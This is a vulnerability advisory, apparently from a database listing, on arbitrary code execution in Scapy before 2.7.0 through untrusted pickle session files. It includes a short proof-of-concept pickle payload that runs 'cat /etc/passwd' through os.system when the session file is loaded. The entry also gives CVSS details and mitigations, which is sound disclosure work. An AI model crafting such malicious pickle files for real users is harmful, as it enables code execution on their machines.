Vulnerability Database

298,930

Total vulnerabilities in the database

Scapy Session Loading Vulnerable to Arbitrary Code Execution via Untrusted Pickle Deserialization

Summary

An unsafe deserialization vulnerability in Scapy <v2.7.0 allows attackers to execute arbitrary code when a malicious session file is locally loaded via the -s option. This requires convincing a user to manually load a malicious session file.

Details

Scapy’s interactive shell supports session loading using gzip-compressed pickle files:

./run_scapy -s &lt;session_file.pkl.gz&gt;

Internally, this triggers:

# main.py SESSION = pickle.load(gzip.open(session_name, &quot;rb&quot;))

Since no validation or restriction is performed on the deserialized object, any code embedded via __reduce__() will be executed immediately. This makes it trivial for an attacker to drop a malicious .pkl.gz in a shared folder and have it executed by unsuspecting users.

The vulnerability exists in the load_session function, which deserializes data using pickle.load() on .pkl.gz files provided via the -s CLI flag or programmatically through conf.session.

Affected lines in source code: https://github.com/secdev/scapy/blob/master/scapy/main.py#L569-L572

try: s = pickle.load(gzip.open(fname, &quot;rb&quot;)) except IOError: try: s = pickle.load(open(fname, &quot;rb&quot;))

PoC

Create a malicious payload:

import pickle, os, gzip class RCE: def __reduce__(self): return (os.system, (&quot;cat /etc/passwd&quot;,)) payload = gzip.compress(pickle.dumps(RCE())) with open(&quot;evil.pkl.gz&quot;, &quot;wb&quot;) as f: f.write(payload)

Then run Scapy with:

./run_scapy -s ./evil.pkl.gz

Result: cat /etc/passwd executes immediately, before shell is shown.

<img width="1035" height="961" alt="Screenshot 2025-08-05 034930-1" src="https://github.com/user-attachments/assets/6748e9bc-57cb-4bd7-977e-e29da8ebc23d" />

Impact

This is a classic deserialization vulnerability which leads to Code Execution (CE) when untrusted data is deserialized.

Any user who can trick another user into loading a crafted .pkl.gz session file (e.g. via -s option) can execute arbitrary Python code.

  • Vulnerability type: Insecure deserialization (Python pickle)
  • CWE: CWE-502: Deserialization of Untrusted Data
  • CVSS v4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • CVSS Score: 5.4 (Medium)
  • Impact: Arbitrary Code Execution
  • Attack vector: Local or supply chain (malicious .pkl.gz)
  • Affected users: Any user who loads session files (even interactively)
  • Affected version: Scapy v2.6.1

Mitigations

  • Do not use 'sessions' (the -s option when launching Scapy).
  • Use the Scapy 2.7.0+ where the session mechanism has been removed.

No technical information available.

CWEs:

OWASP TOP 10:

Software From Fixed in
Python icon scapy - 2.6.1.x